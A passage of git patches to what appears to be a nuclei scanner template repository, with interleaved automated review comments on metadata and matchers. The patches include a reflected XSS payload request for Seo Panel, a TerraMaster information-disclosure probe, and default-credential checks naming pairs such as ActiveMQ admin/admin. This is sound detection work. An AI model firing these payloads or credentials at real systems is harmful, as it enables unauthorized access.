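Review bot: The added NVD reference points at the wrong advisory: this file is the CVE-2021-41648 template but the new line reads `- https://nvd.nist.gov/vuln/detail/CVE-2021-41649`, which is the sibling issue handled in PATCH 061; it should be `- https://nvd.nist.gov/vuln/detail/CVE-2021-41648`. Separately, the new `name:` drops the product entirely ("PuneethReddyHC action.php SQL Injection") while the sibling template in PATCH 061 is named "PuneethReddyHC Online Shopping System homeaction.php SQL Injection"; for consistency use `name: PuneethReddyHC Online Shopping System action.php SQL Injection`. The classification block continues past the end of this hunk.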
@@ -38,3 +41,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/07
From bcc094893a269c19056f2ef5af3ba3c98bdd57a2 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 14:02:44 -0500
Subject: [PATCH 061/259] Enhancement: cves/2021/CVE-2021-41649.yaml by mp
---
cves/2021/CVE-2021-41649.yaml | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-41649.yaml b/cves/2021/CVE-2021-41649.yaml
index c25aafc9c0..238c3c1178 100644
--- a/cves/2021/CVE-2021-41649.yaml
+++ b/cves/2021/CVE-2021-41649.yaml
@@ -1,11 +1,14 @@
id: CVE-2021-41649
info:
- name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
+ name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection
author: daffainfo
severity: critical
- description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
- reference: https://github.com/MobiusBinary/CVE-2021-41649
+ description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
+ reference:
+ - https://github.com/MobiusBinary/CVE-2021-41649
+ - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@@ -37,3 +40,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/07
From aac30ad6efe8060ac9d3c26713fca2155a15156c Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 14:04:05 -0500
Subject: [PATCH 062/259] Enhancement: cves/2010/CVE-2010-1602.yaml by mp
---
cves/2010/CVE-2010-1602.yaml | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml
index 24c6ab5d3d..c4ba030f87 100644
--- a/cves/2010/CVE-2010-1602.yaml
+++ b/cves/2010/CVE-2010-1602.yaml
@@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
- remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
@@ -26,4 +25,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/02/15
+# Enhanced by mp on 2022/03/07
From 81868f926d4413bd9b618cd04385e26b2e5c9142 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 14:12:26 -0500
Subject: [PATCH 063/259] Enhancement: cves/2021/CVE-2021-4191.yaml by mp
---
cves/2021/CVE-2021-4191.yaml | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-4191.yaml b/cves/2021/CVE-2021-4191.yaml
index ece7be5fbf..39716563f3 100644
--- a/cves/2021/CVE-2021-4191.yaml
+++ b/cves/2021/CVE-2021-4191.yaml
@@ -4,10 +4,11 @@ info:
name: GitLab GraphQL API User Enumeration
author: zsusac
severity: medium
- description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
+ description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
reference:
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191
classification:
cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
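Review bot: The added MITRE reference omits the `CVE-` prefix in the query (`name=2021-4191`); the cvename.cgi lookup takes the full identifier, so the link should be `- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4191`. The same truncated form is added in PATCH 068 (`name=2021-3002`). While this block is being touched, the unchanged context line `cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` carries the score where the vector version belongs; every other template in this series uses the `CVSS:3.1/` prefix, so this looks like a pre-existing typo worth fixing in the same pass. The matcher section is outside this hunk.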
@@ -47,3 +48,5 @@ requests:
- type: json
json:
- '.data.users.nodes[].username'
+
+# Enhanced by mp on 2022/03/07
From 2ebcbed6a341b6e6b89a5ca03b0c21c3285f507b Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 00:49:41 +0530
Subject: [PATCH 064/259] additional matcher
---
cves/2022/CVE-2022-0381.yaml | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/cves/2022/CVE-2022-0381.yaml b/cves/2022/CVE-2022-0381.yaml
index e4c75198fc..c467531f95 100644
--- a/cves/2022/CVE-2022-0381.yaml
+++ b/cves/2022/CVE-2022-0381.yaml
@@ -26,6 +26,11 @@ requests:
status:
- 200
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
- type: word
part: body
words:
From 967f6b85826e7d999a4bd643b67a924a043f89cd Mon Sep 17 00:00:00 2001
From: sullo
Date: Mon, 7 Mar 2022 14:20:30 -0500
Subject: [PATCH 065/259] YAML typo fixes
---
default-logins/flir/flir-default-login.yaml | 2 +-
default-logins/gitlab/gitlab-weak-login.yaml | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 8ded74e2f8..befef88325 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -8,7 +8,7 @@ info:
reference:
- https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
- classificaiton:
+ classification:
cwe-id: CWE-798
requests:
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index 1c7aad6898..b9e97461ce 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -11,7 +11,7 @@ info:
- https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
metadata:
shodan-query: http.title:"GitLab"
- classificaiton:
+ classification:
cwe-id: CWE-798
requests:
From ca555193ac492853d06d70def5fb1de0d2bac2cb Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 7 Mar 2022 19:21:30 +0000
Subject: [PATCH 066/259] Auto Generated New Template Addition List [Mon Mar 7
19:21:30 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 2e4fbaa088..c5d1d55c98 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
From 2d0d48fdb713f03a26003202154ddd90bf35c7bf Mon Sep 17 00:00:00 2001
From: sullo
Date: Mon, 7 Mar 2022 14:26:37 -0500
Subject: [PATCH 067/259] Trailing space
---
cves/2021/CVE-2021-4191.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-4191.yaml b/cves/2021/CVE-2021-4191.yaml
index 39716563f3..bccbb6ac4d 100644
--- a/cves/2021/CVE-2021-4191.yaml
+++ b/cves/2021/CVE-2021-4191.yaml
@@ -4,7 +4,7 @@ info:
name: GitLab GraphQL API User Enumeration
author: zsusac
severity: medium
- description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
+ description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
reference:
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
From 7032b928cc7117c8d1f623bd81c180520cb4f405 Mon Sep 17 00:00:00 2001
From: edoardottt
Date: Mon, 7 Mar 2022 20:47:40 +0100
Subject: [PATCH 068/259] Add CVE-2021-3002
---
cves/2021/CVE-2021-3002.yaml | 41 ++++++++++++++++++++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100644 cves/2021/CVE-2021-3002.yaml
diff --git a/cves/2021/CVE-2021-3002.yaml b/cves/2021/CVE-2021-3002.yaml
new file mode 100644
index 0000000000..573900166e
--- /dev/null
+++ b/cves/2021/CVE-2021-3002.yaml
@@ -0,0 +1,41 @@
+id: CVE-2021-3002
+
+info:
+ name: Seo Panel 4.8.0 - Post based Reflected XSS
+ author: edoardottt
+ severity: medium
+ description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-3002
+ cwe-id: CWE-79
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3002
+ tags: cve,cve2021,seopanel,xss
+
+requests:
+ - raw:
+ - |
+ POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ part: body
+ words:
+ - "11"
\ No newline at end of file
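Review bot: The final body matcher keys on the word `"11"`, which is the trailing marker appended to the injected payload but on its own will match almost any HTML page (version strings, dates, ids), so the template would report the issue wherever the status and content-type checks pass. A more specific check would look for the reflected injection itself (the `img` element with the `onerror` handler from the POST body) rather than the two-character suffix; PATCH 072 later rewrites this matcher. The MITRE reference on the `name=2021-3002` line has the same missing `CVE-` prefix noted on PATCH 063. The new file also ends without a trailing newline.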
From 00dc60ef7324d7ebfda476d39b681bb8763e5df5 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 01:22:18 +0530
Subject: [PATCH 069/259] misc updates
---
exposed-panels/kentico-login.yaml | 28 ++++++++++++++++------------
1 file changed, 16 insertions(+), 12 deletions(-)
diff --git a/exposed-panels/kentico-login.yaml b/exposed-panels/kentico-login.yaml
index 0911e767d4..dd78b255da 100644
--- a/exposed-panels/kentico-login.yaml
+++ b/exposed-panels/kentico-login.yaml
@@ -1,24 +1,28 @@
-id: Kentico-login
+id: kentico-login
info:
- name: Kentico Login Page Detection
+ name: Kentico Login Panel
author: d4vy
severity: info
- tags: panel, login, kentico
+ tags: panel,login,kentico
requests:
- method: GET
path:
- "{{BaseURL}}/Admin/CMSAdministration.aspx"
- - "{{BaseURL}}/CMSPages/logon.aspx?ReturnUrl=%2fAdmin%2fCMSAdministration.aspx"
+ - "{{BaseURL}}/CMSPages/logon.aspx"
- matchers-condition: and
+ stop-at-first-match: true
+ matchers-condition: or
matchers:
- - type: word
- part: body
- words:
- - 'action="./logon.aspx?ReturnUrl=%2fAdmin%2fCMSAdministration.aspx"'
+ - type: dsl
+ dsl:
+ - "status_code==302"
+ - "contains(tolower(body), 'cmspages/logon.aspx')"
+ condition: and
- - type: status
- status:
- - 200
+ - type: dsl
+ dsl:
+ - "status_code==200"
+ - "contains(tolower(body), 'cmspages/getresource.ashx')"
+ condition: and
\ No newline at end of file
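Review bot: The first DSL matcher pairs `status_code==302` with a body search for `cmspages/logon.aspx`, but a redirect's body is server-dependent and may be empty, in which case the match silently fails even though the `Location` header carries exactly that path. If the DSL exposes the raw headers (nuclei's `all_headers` variable, as far as I can tell), a more robust form is `- "contains(tolower(all_headers), 'cmspages/logon.aspx') || contains(tolower(body), 'cmspages/logon.aspx')"`; please verify the variable name against the engine version in use. The rewritten file still lacks a trailing newline, as do the new files added in PATCH 057 and PATCH 068.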
From 6f36767069efa9dd5344c1398c983fd70aa14f92 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 01:23:08 +0530
Subject: [PATCH 070/259] added reference
---
exposed-panels/kentico-login.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/exposed-panels/kentico-login.yaml b/exposed-panels/kentico-login.yaml
index dd78b255da..30b81930bd 100644
--- a/exposed-panels/kentico-login.yaml
+++ b/exposed-panels/kentico-login.yaml
@@ -4,6 +4,7 @@ info:
name: Kentico Login Panel
author: d4vy
severity: info
+ reference: https://docs.xperience.io/k8/using-the-kentico-interface
tags: panel,login,kentico
requests:
From d2f7e17869054e4ad5977158d91dca2b123337bc Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 7 Mar 2022 19:54:55 +0000
Subject: [PATCH 071/259] Auto Generated New Template Addition List [Mon Mar 7
19:54:55 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index c5d1d55c98..7d994443d9 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
+exposed-panels/kentico-login.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
From 20774864c51599cb747cd2cd153b45bbb4431141 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 01:28:57 +0530
Subject: [PATCH 072/259] misc updates
---
cves/2021/CVE-2021-3002.yaml | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-3002.yaml b/cves/2021/CVE-2021-3002.yaml
index 573900166e..781aba2d77 100644
--- a/cves/2021/CVE-2021-3002.yaml
+++ b/cves/2021/CVE-2021-3002.yaml
@@ -12,12 +12,12 @@ info:
cwe-id: CWE-79
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3002
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3002
+ - http://www.cinquino.eu/SeoPanelReflect.htm
tags: cve,cve2021,seopanel,xss
requests:
- raw:
- - |
+ - |
POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
@@ -38,4 +38,6 @@ requests:
- type: word
part: body
words:
- - "11"
\ No newline at end of file
+ - ""
+ - "seopanel"
+ condition: and
\ No newline at end of file
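Review bot: As printed, the first replacement word is the empty string (`- ""`), and an empty substring is contained in every body, so with `condition: and` the matcher reduces to the single check for `"seopanel"` and no longer verifies that the injected payload was reflected. It is possible this rendering dropped an HTML tag from inside the quotes (the POST body injects an `img` element), in which case the line is fine in the actual file; otherwise the word should be the reflected `onerror` fragment, e.g. `- "onerror=alert(document.domain)"`. Worth confirming against the committed file before merging.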
From 1a5e5bda278fb7635ace09c1aaccd85b9393743c Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 7 Mar 2022 20:01:45 +0000
Subject: [PATCH 073/259] Auto Generated New Template Addition List [Mon Mar 7
20:01:44 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 7d994443d9..c749ffc502 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
From 73a06a5fab6c3698dce2f18da71b753f565512b0 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 16:29:30 -0500
Subject: [PATCH 074/259] Enhancement: cves/2021/CVE-2021-44521.yaml by mp
---
cves/2021/CVE-2021-44521.yaml | 3 +++
1 file changed, 3 insertions(+)
diff --git a/cves/2021/CVE-2021-44521.yaml b/cves/2021/CVE-2021-44521.yaml
index 85daf83b30..0bd987b8a1 100644
--- a/cves/2021/CVE-2021-44521.yaml
+++ b/cves/2021/CVE-2021-44521.yaml
@@ -8,6 +8,7 @@ info:
reference:
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521
+ - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
tags: cve,cve2021,network,rce,apache,cassandra
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
@@ -54,3 +55,5 @@ network:
part: raw
words:
- "123123"
+
+# Enhanced by mp on 2022/03/07
From 1af2e53732c48a94efdcaa51ce71221ea62e13ea Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 16:30:03 -0500
Subject: [PATCH 075/259] Enhancement: cves/2010/CVE-2010-1607.yaml by mp
---
cves/2010/CVE-2010-1607.yaml | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml
index c3bc374891..d42c423c71 100644
--- a/cves/2010/CVE-2010-1607.yaml
+++ b/cves/2010/CVE-2010-1607.yaml
@@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
- remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12316
- https://www.cvedetails.com/cve/CVE-2010-1607
@@ -26,4 +25,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/02/15
+# Enhanced by mp on 2022/03/07
From 5a99c2c4f4cc957c1e2d58e000365811ad182154 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 16:36:44 -0500
Subject: [PATCH 076/259] Enhancement: cves/2022/CVE-2022-25323.yaml by mp
---
cves/2022/CVE-2022-25323.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-25323.yaml b/cves/2022/CVE-2022-25323.yaml
index 187fb5a0c3..9862f10447 100644
--- a/cves/2022/CVE-2022-25323.yaml
+++ b/cves/2022/CVE-2022-25323.yaml
@@ -1,10 +1,10 @@
id: CVE-2022-25323
info:
- name: ZEROF Web Server 2.0 XSS
+ name: ZEROF Web Server 2.0 Cross-Site Scripting
author: pikpikcu
severity: medium
- description: ZEROF Web Server 2.0 allows /admin.back XSS.
+ description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
reference:
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
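Review bot: The rewritten `description:` still reads "ZEROF Web Server 2.0 allows /admin.back cross-site scripting.", which only swapped the acronym; the phrasing is unidiomatic and does not say that `/admin.back` is where the issue lies. Suggest `description: ZEROF Web Server 2.0 contains a cross-site scripting vulnerability via /admin.back.` The request and matcher block is outside this hunk.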
@@ -31,3 +31,5 @@ requests:
- type: status
status:
- 401
+
+# Enhanced by mp on 2022/03/07
From b7d2b80dd053c2ea668cc9f333478a4e8c6067d3 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 16:51:17 -0500
Subject: [PATCH 077/259] Enhancement:
default-logins/UCMDB/ucmdb-default-login.yaml by mp
---
default-logins/UCMDB/ucmdb-default-login.yaml | 9 ++++++++-
1 file changed, 8 insertions(+), 1 deletion(-)
diff --git a/default-logins/UCMDB/ucmdb-default-login.yaml b/default-logins/UCMDB/ucmdb-default-login.yaml
index d7dc80bd03..169611f6d5 100644
--- a/default-logins/UCMDB/ucmdb-default-login.yaml
+++ b/default-logins/UCMDB/ucmdb-default-login.yaml
@@ -1,9 +1,14 @@
id: ucmdb-default-login
info:
- name: Micro Focus UCMDB Default Login
+ name: Micro Focus Universal CMDB Default Login
author: dwisiswant0
severity: high
+ description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854.
+ reference:
+ - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm
+ classification:
+ cwe-id: CWE-798
tags: ucmdb,default-login
requests:
@@ -31,3 +36,5 @@ requests:
part: header
words:
- "LWSSO_COOKIE_KEY"
+
+# Enhanced by mp on 2022/03/07
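Review bot: `diagnostics/admin` on the `+ description:` line is ambiguous about which half is the user name and which is the password, and the NOTE sentence points the reader at two other CVEs without saying how they chain. Spell the pair out in the same `user:password` shape the other default-login templates use, e.g. `description: Micro Focus Universal CMDB default login credentials (diagnostics:admin) were discovered; the reference shows this being chained with CVE-2020-11853 and CVE-2020-11854 to reach remote code execution.` — assuming diagnostics is the account and admin the password, verify against the request body above this hunk. A `remediation: Change the default credentials.` line would bring it in line with its siblings. The second hunk matches only on the `LWSSO_COOKIE_KEY` header name, so confirm that cookie is not also set on a failed login, otherwise the template will false-positive.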
From b54ca5333afb994909b50e7c1922d531bb5d7f30 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 18:25:55 -0500
Subject: [PATCH 078/259] Enhancement:
default-logins/abb/cs141-default-login.yaml by mp
---
default-logins/abb/cs141-default-login.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml
index 92c18a864b..a5b739329c 100644
--- a/default-logins/abb/cs141-default-login.yaml
+++ b/default-logins/abb/cs141-default-login.yaml
@@ -1,13 +1,16 @@
id: cs141-default-login
info:
- name: CS141 SNMP Module Default Login
+ name: UPS Adapter CS141 SNMP Module Default Login
author: socketz
severity: medium
+ description: UPS Adapter CS141 SNMP Module default login credentials were discovered.
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
tags: hiawatha,iot,default-login
metadata:
shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
+ classification:
+ cwe-id: CWE-798
requests:
- raw:
@@ -48,3 +51,5 @@ requests:
- type: kval
kval:
- accessToken
+
+# Enhanced by mp on 2022/03/07
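Review bot: The added description only restates the name and gives neither the credentials the template tries nor a remediation, and the new `classification:` lines are appended directly after `metadata:`/`shodan-query:`, so check in the file that `classification:` sits at `info` level and is not nested under `metadata` (indentation is not recoverable from this listing). The template lives under `default-logins/abb/` and is tagged `hiawatha,iot`, while the only reference is a Generex CS141 manual; if the product is the Generex adapter, a `cs141`/`generex` tag describes it better than `hiawatha`, which is the embedded web server. Add `remediation: Change the default credentials after installation.` The raw request and the first matchers lie between the two hunks.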
From 54668eb20cfdd2bde073156c570edbbb6a42951d Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 18:30:38 -0500
Subject: [PATCH 079/259] Enhancement:
default-logins/activemq/activemq-default-login.yaml by mp
---
default-logins/activemq/activemq-default-login.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
index a4dea884a5..e0344f7452 100644
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -4,6 +4,9 @@ info:
name: Apache ActiveMQ Default Login
author: pdteam
severity: medium
+ description: Apache ActiveMQ default login information was discovered. The default administration user name and password for the Apache ActiveMQ Administration Console is admin and admin respectively.
+ remediation: Change the default credentials.
+ reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
tags: apache,activemq,default-login
requests:
@@ -26,4 +29,6 @@ requests:
words:
- 'Welcome to the Apache ActiveMQ Console of '
- 'Broker
'
- condition: and
\ No newline at end of file
+ condition: and
+
+# Enhanced by mp on 2022/03/07
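Review bot: Unlike the other default-login templates touched in this series (UCMDB, CS141), no `classification:` with `cwe-id: CWE-798` was added alongside the new description and remediation; add it under `info` for consistency. In the second hunk `'Broker` and its closing `'` appear on two lines — if that is a real line break inside the single-quoted scalar rather than an artifact of this listing, YAML folds it to a trailing space and the `condition: and` matcher would look for `Broker ` rather than `Broker`; confirm the value in the file.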
From 246645a44cbf9266580d74e2b952a7953aaa7127 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 18:33:04 -0500
Subject: [PATCH 080/259] Enhancement:
default-logins/activemq/activemq-default-login.yaml by mp
---
default-logins/activemq/activemq-default-login.yaml | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml
index e0344f7452..9714139497 100644
--- a/default-logins/activemq/activemq-default-login.yaml
+++ b/default-logins/activemq/activemq-default-login.yaml
@@ -4,8 +4,7 @@ info:
name: Apache ActiveMQ Default Login
author: pdteam
severity: medium
- description: Apache ActiveMQ default login information was discovered. The default administration user name and password for the Apache ActiveMQ Administration Console is admin and admin respectively.
- remediation: Change the default credentials.
+ description: Apache ActiveMQ default login information was discovered.
reference: https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html
tags: apache,activemq,default-login
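Review bot: This commit drops the `remediation: Change the default credentials.` line together with the credential detail, which removes the only actionable guidance the template had. Keep the remediation even if the admin:admin pair is taken out of the description, e.g. restore `remediation: Change the default credentials of the ActiveMQ web console.` After this change the Broadcom reference is the only thing left that tells the reader what was found and how to fix it.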
From 29d462125c216fc04ebd91f5ee21bf0b23ffdc13 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 8 Mar 2022 08:05:30 +0700
Subject: [PATCH 081/259] Add CVE-2022-24990
---
cves/2022/CVE-2022-24990.yaml | 40 +++++++++++++++++++++++++++++++++++
1 file changed, 40 insertions(+)
create mode 100644 cves/2022/CVE-2022-24990.yaml
diff --git a/cves/2022/CVE-2022-24990.yaml b/cves/2022/CVE-2022-24990.yaml
new file mode 100644
index 0000000000..9163b8bac3
--- /dev/null
+++ b/cves/2022/CVE-2022-24990.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-24990
+
+info:
+ name: TerraMaster TOS < 4.2.30 - Server Information Disclosure
+ author: dwisiswant0
+ severity: medium
+ description: |
+ TerraMaster NAS devices running TOS prior to version
+ 4.2.30 is vulnerable to information disclosure
+ reference:
+ - https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
+ tags: cve,cve2022,terramaster,disclosure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/module/api.php?mobile/webNasIPS"
+ headers:
+ User-Agent: "TNAS"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+ - "TerraMaster"
+ condition: and
+
+ - type: regex
+ part: body
+ regex:
+ - "webNasIPS successful"
+ - "(ADDR|(IFC|PWD|[DS]AT)):"
+ - "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":" # cherry pick
+ condition: or
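Review bot: The `description:` block is a fragment (`is vulnerable` for a plural subject, no terminating period) and says only "information disclosure", while the single reference is titled as unauthenticated remote command execution; say what the probed endpoint leaks and that it is the first step of that chain. Suggest `description: TerraMaster NAS devices running TOS prior to 4.2.30 expose system details through the unauthenticated /module/api.php?mobile/webNasIPS endpoint, which the referenced research chains into unauthenticated remote code execution.` — confirm the exact leaked fields against the reference before naming them. The `PWD` alternative in the second regex suggests a password or hash is part of the response, so the template should not extract that value into scan output. The `# cherry pick` comment on the last regex does not say what was cherry-picked; replace it with what the pattern is meant to match.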
From 6ae7f3f361746d8ce2afe67b24dd638c539817a6 Mon Sep 17 00:00:00 2001
From: Sandeep Singh
Date: Tue, 8 Mar 2022 06:38:46 +0530
